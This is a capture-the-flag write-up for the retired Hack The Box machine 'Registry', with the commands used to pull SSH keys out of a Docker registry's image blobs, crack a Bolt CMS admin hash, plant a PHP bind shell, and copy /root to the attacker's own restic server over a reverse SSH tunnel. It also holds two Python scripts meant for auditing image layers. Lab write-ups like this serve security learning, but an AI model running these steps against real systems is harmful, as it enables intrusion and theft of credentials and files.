Introduction
Registry is a retired machine from the Hack The Box platform; only writeups of retired machines are allowed.
Registry is a HARD machine worth 40 points.
![Hack the box registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-02-30-02-1024x471.png)
Steps
- Nmap scan
- Enumerating webpages
- Exploiting docker
- Getting docker blobs
- Getting id_rsa keys
- Getting user.txt
- Enumerating
- Login into bolt webpage and uploading reverse shell
- Backing up file using rest server and getting root.txt.
Commands used
- nmap -sC -sV -oV 10.10.10.159
- gobuster dir -u http://10.10.10.159 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
- gobuster dir -u http://docker.registry.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
- curl --user "admin:admin" http://docker.registry.htb/v2/bolt-image/manifests/latest
- ssh -i id_rsa [email protected]
- strings bolt.db | grep admin
- gobuster dir -u http://10.10.10.159/bolt -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
- scp -i id_rsa nc [email protected]:/tmp
- nc 10.10.10.159 12345
- python -c 'import pty; pty.spawn("/bin/sh")'
- bash -i
- sudo -l
- apt-get install restic
- restic init --repo writeup
- rest-server --path writeup --no-auth
- ssh -R 8000:127.0.0.1:8000 -i id_rsa [email protected]
- sudo /usr/bin/restic backup -r rest:http://localhost:8000 /root
- restic restore 0feef7a574a2491f47aeb6ed06cdc806a9821d3f75d9d92f66561ab2a733ff19 --target /root/Desktop/htb/registry/ -r /root/Desktop/htb/registry/writeup/
Nmap Scan
Nmap 7.70 scan initiated Wed Feb 5 09:24:37 2020 as: nmap -sC -sV -oV 10.10.10.159
Nmap scan report for 10.10.10.159
Host is up (0.42s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
| 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after: 2029-05-03T21:14:35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Wed Feb 5 09:26:38 2020 -- 1 IP address (1 host up) scanned in 120.76 seconds
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-04-31-44-1024x370.png)
Enumerating webpages
As I enumerated, I found /bolt.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-05-13-16-1024x233.png)
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-05-20-56-1024x480.png)
Exploiting docker
But for now let's focus on Docker, as we found that in the nmap scan.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-05-16-57-1024x234.png)
When I opened it, it asked for a password. I simply tried admin:admin and it worked.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-05-22-31-1024x505.png)
I had to read the Docker docs to proceed further.
So, according to the docs, let's look at /_catalog.
This gives us the repos in it.
Got a “bolt-image” repo.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-07-06-10-1024x445.png)
Getting docker blobs
After gathering some information about Docker, I now knew that I could download the Docker blobs, which could give me juicy information.
So now let's try to get those.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-07-12-28-1024x495.png)
root@kali:~/Desktop/htb/registry# curl --user "admin:admin" http://docker.registry.htb/v2/bolt-image/manifests/latest
{
"schemaVersion": 1,
"name": "bolt-image",
"tag": "latest",
"architecture": "amd64",
"fsLayers": [
{
"blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
},
{
"blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"
},
{
"blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"
},
{
"blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"
},
{
"blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0"
},
{
"blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a"
},
{
"blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797"
},
{
"blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"
}
],
"history": [
{
"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"e2e88012228993b25b697ee37a0aae0cb0ecef7b1536d2b8e488a6ec3f353f14\",\"container_config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-05-25T15:18:56.9530238Z\",\"docker_version\":\"18.09.2\",\"id\":\"f18c41121574af38e7d88d4f5d7ea9d064beaadd500d13d33e8c419d01aa5ed5\",\"os\":\"linux\",\"parent\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\"}"
},
{
"v1Compatibility": "{\"id\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\",\"parent\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"created\":\"2019-05-25T15:13:31.3975799Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
},
{
"v1Compatibility": "{\"id\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"parent\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"created\":\"2019-05-25T14:57:27.6745842Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
},
{
"v1Compatibility": "{\"id\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"parent\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"created\":\"2019-05-25T14:47:52.6859489Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
},
{
"v1Compatibility": "{\"id\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"parent\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"created\":\"2019-05-24T22:51:14.8744838Z\",\"container_config\":{\"Cmd\":[\"/bin/bash\"]}}"
},
{
"v1Compatibility": "{\"id\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"parent\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"created\":\"2019-04-26T22:21:05.100534088Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\"/bin/bash\\"]\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"parent\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"created\":\"2019-04-26T22:21:04.936777709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p /run/systemd \u0026\u0026 echo 'docker' \u003e /run/systemd/container\"]}}"
},
{
"v1Compatibility": "{\"id\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"parent\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"created\":\"2019-04-26T22:21:04.220422684Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /var/lib/apt/lists/\"]}}" }, { "v1Compatibility": "{\"id\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"parent\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:03.471632173Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -xe \t\t\u0026\u0026 echo '#!/bin/sh' \u003e /usr/sbin/policy-rc.d \t\u0026\u0026 echo 'exit 101' \u003e\u003e /usr/sbin/policy-rc.d \t\u0026\u0026 chmod +x /usr/sbin/policy-rc.d \t\t\u0026\u0026 dpkg-divert --local --rename --add /sbin/initctl \t\u0026\u0026 cp -a /usr/sbin/policy-rc.d /sbin/initctl \t\u0026\u0026 sed -i 's/^exit./exit 0/' /sbin/initctl \t\t\u0026\u0026 echo 'force-unsafe-io' \u003e /etc/dpkg/dpkg.cfg.d/docker-apt-speedup \t\t\u0026\u0026 echo 'DPkg::Post-Invoke { \\"rm -f /var/cache/apt/archives/.deb /var/cache/apt/archives/partial/.deb /var/cache/apt/.bin || true\\"; };' \u003e /etc/apt/apt.conf.d/docker-clean \t\u0026\u0026 echo 'APT::Update::Post-Invoke { \\"rm -f /var/cache/apt/archives/.deb /var/cache/apt/archives/partial/.deb /var/cache/apt/.bin || true\\"; };' \u003e\u003e /etc/apt/apt.conf.d/docker-clean \t\u0026\u0026 echo 'Dir::Cache::pkgcache \\"\\"; Dir::Cache::srcpkgcache \\"\\";' \u003e\u003e /etc/apt/apt.conf.d/docker-clean \t\t\u0026\u0026 echo 'Acquire::Languages \\"none\\";' \u003e /etc/apt/apt.conf.d/docker-no-languages \t\t\u0026\u0026 echo 'Acquire::GzipIndexes \\"true\\"; Acquire::CompressionTypes::Order:: \\"gz\\";' \u003e /etc/apt/apt.conf.d/docker-gzip-indexes \t\t\u0026\u0026 echo 'Apt::AutoRemove::SuggestsImportant \\"false\\";' \u003e /etc/apt/apt.conf.d/docker-autoremove-suggests\"]}}"
},
{
"v1Compatibility": "{\"id\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:02.724843678Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:7ce84f13f11609a50ece7823578159412e2299c812746d1d1f1ed5db0728bd37 in / \"]}}"
}
],
"signatures": [
{
"header": {
"jwk": {
"crv": "P-256",
"kid": "QQ2T:PCE7:WMFR:5VWJ:FF32:J2HW:G5LM:3XTD:HJQX:TEFW:FKBN:QK7D",
"kty": "EC",
"x": "SyOHJcjv-eu4X_77D9pe8kI0sXaWPTxo8WiUwnGvwXE",
"y": "u_IHhlf6_3V1LMlThz5uTkN7Hte_3MKTRG8KFK08TBg"
},
"alg": "ES256"
},
"signature": "Cwt68GIS76MHRn5M1uxdF6DQkCvMpwCdcDH7BJHfZsh5fcfhRsoA5ouGM1J_CJDl1KaZakg-b4hAxWSNOS_3hw",
"protected": "eyJmb3JtYXRMZW5ndGgiOjY3OTIsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMC0wNC0wM1QxMToxNDo1NVoifQ"
}
]
Now let's download a blob by its blobSum:
https://docker.registry.htb/v2/bolt-image/blobs/sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7
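When auditing your own registry, the manifest above already says which blobs deserve a look: in a schema v1 manifest, fsLayers and history are parallel lists (newest layer first), so each digest can be paired with the step that created it. The following is an added example, not code from the original writeup; the sample manifest, its placeholder digests and the "interactive commit" heuristic are assumptions made for illustration.

```python
import json

# Digest Docker uses for the empty gzip'd tar behind metadata-only build steps.
EMPTY_LAYER = "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"

def layers_with_history(manifest_text):
    """Pair each fsLayers digest with the history entry at the same index."""
    manifest = json.loads(manifest_text)
    if manifest.get("schemaVersion") != 1:
        raise ValueError("fsLayers/history only exist in schema v1 manifests")
    layers, history = manifest["fsLayers"], manifest["history"]
    if len(layers) != len(history):
        raise ValueError("fsLayers and history are expected to be parallel")
    rows = []
    for layer, entry in zip(layers, history):
        v1 = json.loads(entry["v1Compatibility"])  # JSON nested in a JSON string
        cmd = " ".join(v1.get("container_config", {}).get("Cmd") or [])
        empty = layer["blobSum"] == EMPTY_LAYER or bool(v1.get("throwaway"))
        rows.append({"digest": layer["blobSum"], "cmd": cmd, "empty": empty})
    return rows

def layers_to_audit(rows):
    """Unique non-empty digests, base layer first, with an 'interactive' flag.

    Heuristic (assumption): a bare shell as the recorded command means the layer
    came from committing an interactive session, so no Dockerfile documents it.
    """
    seen, out = set(), []
    for row in reversed(rows):  # schema v1 lists the newest layer first
        if row["empty"] or row["digest"] in seen:
            continue
        seen.add(row["digest"])
        out.append((row["digest"], row["cmd"].strip() in ("bash", "/bin/bash")))
    return out

def _step(cmd, **extra):
    """Build one constructed history entry."""
    body = {"container_config": {"Cmd": [cmd]}, **extra}
    return {"v1Compatibility": json.dumps(body)}

# Constructed sample manifest; the two non-empty digests are placeholders.
SAMPLE = json.dumps({
    "schemaVersion": 1, "name": "example-image", "tag": "latest",
    "fsLayers": [{"blobSum": "sha256:" + "aa" * 32},
                 {"blobSum": EMPTY_LAYER},
                 {"blobSum": "sha256:" + "bb" * 32}],
    "history": [_step("bash"),
                _step('/bin/sh -c #(nop) CMD ["/bin/bash"]', throwaway=True),
                _step("/bin/sh -c #(nop) ADD file:placeholder in / ")],
})

if __name__ == "__main__":
    for digest, interactive in layers_to_audit(layers_with_history(SAMPLE)):
        print(digest[:19], "interactive commit" if interactive else "scripted step")
```

In the manifest shown above, the entry marked "throwaway" lines up with the a3ed95ca… digest, and the newest layers record only "bash" as their command.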
Getting id_rsa keys.
I downloaded all the blobs and placed them in the folder.
After extracting the files I got many directories.
In the root directory I found a .ssh file for user bolt.
And after a little enumeration I found the passphrase for the encrypted id_rsa.
So let's SSH into the machine using the id_rsa key, as port 22 is open.
Before running it, make sure that you give the key permission 600:
chmod 600 id_rsa
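The finding above (an SSH key sitting in an image layer) is something an image owner can check for before pushing. The following is an added example, not code from the original writeup: it scans layer blobs in memory for private-key material and sensitive file names, and goes one step beyond the page by also reporting files that a later layer "deleted" with a whiteout marker, since the earlier blob still serves them. The sample layers, paths and key text are constructed.

```python
import io
import re
import tarfile

KEY_HEADER = re.compile(rb"-----BEGIN (?:[A-Z0-9]+ )*PRIVATE KEY-----")
SENSITIVE_NAME = re.compile(
    r"(^|/)(id_(rsa|dsa|ecdsa|ed25519)|authorized_keys|\.bash_history|[^/]+\.(pem|key))$")

def make_layer(files):
    """Build a constructed gzip'd tar layer in memory from {path: bytes}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def scan_layer(blob):
    """Return (findings, whiteouts) for one layer blob, never unpacking to disk."""
    findings, whiteouts = [], set()
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tar:
        for member in tar:
            head, _, base = member.name.rpartition("/")
            if base.startswith(".wh."):  # marker that deletes a lower-layer file
                whiteouts.add((head + "/" if head else "") + base[4:])
            elif member.isfile():
                data = tar.extractfile(member).read(8192)
                if KEY_HEADER.search(data):
                    marked = b"ENCRYPTED" in data
                    findings.append((member.name, "private key (PEM marked ENCRYPTED)"
                                     if marked else "private key (no ENCRYPTED marker)"))
                elif SENSITIVE_NAME.search(member.name):
                    findings.append((member.name, "sensitive file name"))
    return findings, whiteouts

def audit_image(layers):
    """layers: blobs ordered base first. Flags files a later layer 'deleted'."""
    scanned = [scan_layer(blob) for blob in layers]
    report = []
    for i, (findings, _) in enumerate(scanned):
        later = set().union(*(w for _, w in scanned[i + 1:]))
        for path, reason in findings:
            report.append({"layer": i, "path": path, "reason": reason,
                           "deleted_later": path in later})
    return report

# Constructed sample: not a real key, only the PEM framing the scanner looks for.
FAKE_KEY = (b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
            b"\nCONSTRUCTED-PLACEHOLDER\n-----END RSA PRIVATE KEY-----\n")
SAMPLE_LAYERS = [
    make_layer({"etc/hostname": b"example\n"}),
    make_layer({"root/.ssh/id_rsa": FAKE_KEY, "root/.bash_history": b"ls\n"}),
    make_layer({"root/.ssh/.wh.id_rsa": b""}),
]

if __name__ == "__main__":
    for finding in audit_image(SAMPLE_LAYERS):
        print(finding)
```

An encrypted key is still reported, because, as on this machine, the passphrase may be recoverable from the same image.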
Getting user.txt
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-07-28-48-1024x374.png)
Enumerating
After logging in as bolt we have user.txt.
I had found 10.10.10.159/bolt with gobuster, so now I was searching for a database or config file. So I went inside /var and, enumerating in www, found a bolt.db.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-07-36-29-1024x410.png)
You can either download it with nc to your machine and then use any online .db file opener.
But I used the strings command and found the hash for the admin of the website.
bolt@bolt:/var/www/html/bolt/app/database$ strings bolt.db | grep admin
2020-04-03 09:10:11Logged in: admin/bolt/bolt/loginpostLogin10.10.14.4authentication{"file":"/src/Controller/Backend/Authentication.php","line":193}
2020-04-03 08:55:26Logged in: admin/bolt/bolt/loginpostLogin10.10.15.181authentication{"file":"/src/Controller/Backend/Authentication.php","line":193}
2020-04-03 08:46:00Logged out: admin/bolt/bolt/logoutlogout10.10.15.181authentication{"file":"/src/Controller/Backend/Authentication.php","line":129}
2020-04-03 08:23:51Logged in: admin/bolt/bolt/loginpostLogin10.10.15.181authentication{"file":"/src/Controller/Backend/Authentication.php","line":193}
2019-10-17 14:34:52Logged in: admin/bolt/bolt/loginpostLogin10.10.14.2authentication{"file":"/src/Controller/Backend/Authentication.php","line":193}
3admin$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/[email protected] 09:10:1110.10.14.4Admin["files://bind.php"]["root","everyone"]
admin
I used john to decrypt the hash and got the password “strawberry”.
Now that we have creds, let's find the login page.
root@kali:~/Desktop/htb/registry# gobuster dir -u http://10.10.10.159/bolt -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url: http://10.10.10.159/bolt
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
2020/04/03 07:51:56 Starting gobuster
/files (Status: 301)
/tests (Status: 301)
/src (Status: 301)
/app (Status: 301)
/theme (Status: 301)
/vendor (Status: 301)
/extensions (Status: 301)
/bolt (Status: 302)
Login into bolt webpage and uploading reverse shell
I got a /bolt again, and when I visited it, it landed me on the login page.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-07-58-23-1024x498.png)
Now I created a simple PHP reverse shell.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-08-00-28-1024x365.png)
But before I did that, I needed to transfer my nc to the target machine.
scp -i id_rsa nc [email protected]:/tmp
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-05-18-1024x84.png)
If you are not familiar with scp, you can also use base64.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-07-29-1024x431.png)
Then we can simply copy and paste it on the target machine and run a simple chmod +x command.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-10-00-1024x443.png)
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-10-35-1024x155.png)
But when I tried to upload the PHP file, I was unable to. Then I changed the main configuration.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-03-07-59-07-1024x503.png)
So I added php to it. Once I had done everything, I went to File management to upload my file.
I got errors like this many times.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-17-31-1024x447.png)
Now I have to upload the PHP file quickly, as the machine has cron jobs which will revert my changes; hence I need to be fast in doing this.
Here we are using a bind shell, so once our .php file executes we will run our nc (netcat).
We used a bind shell because the machine does not allow reverse shells.
![](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-20-40-1024x170.png)
On doing sudo -l I found a restic server backup command which wwwdata can run. So I thought of backing up data to my own system using a restic server.
We have to install the restic server on our own machine:
apt-get install restic
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-26-36-1024x179.png)
We can google and easily find how that works; now it was time to initialize a repo.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-37-17-1024x137.png)
root@kali:~/Desktop/htb/registry# restic init --repo writeup
enter password for new repository:
enter password again:
created restic repository d53e9e7757 at writeup
Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.
root@kali:~/Desktop/htb/registry# rest-server --path writeup --no-auth
Data directory: writeup
Authentication disabled
Private repositories disabled
Starting server on :8000
After initializing, we now need to set the path.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-50-06-1024x79.png)
Used --no-auth for no authentication.
Now we need to do port forwarding in order to get the backup.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-55-23-1024x185.png)
root@kali:~/Desktop/htb/registry# ssh -R 8000:127.0.0.1:8000 -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
System information as of Sat Apr 4 05:42:35 UTC 2020
System load: 0.0 Users logged in: 1
Usage of /: 6.5% of 61.80GB IP address for eth0: 10.10.10.159
Memory usage: 46% IP address for br-1bad9bd75d17: 172.18.0.1
Swap usage: 1% IP address for docker0: 172.17.0.1
Processes: 181
Last login: Sat Apr 4 05:00:22 2020 from 10.10.14.63
bolt@bolt:~$
Once we have done everything, it's time to back up the data to our own machine.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-40-41-1024x173.png)
Once we do it successfully, a snapshot will be stored on our local machine and then we can just restore that.
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-45-06-1024x113.png)
root@kali:~/Desktop/htb/registry/root# cat root.txt
ntr###############################w
![Hack the box(HTB) Registry writeup](https://www.whatinfotech.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-04-01-45-19-1024x44.png)
Thanks for reading my writeup.
Superb bro
thanks buddy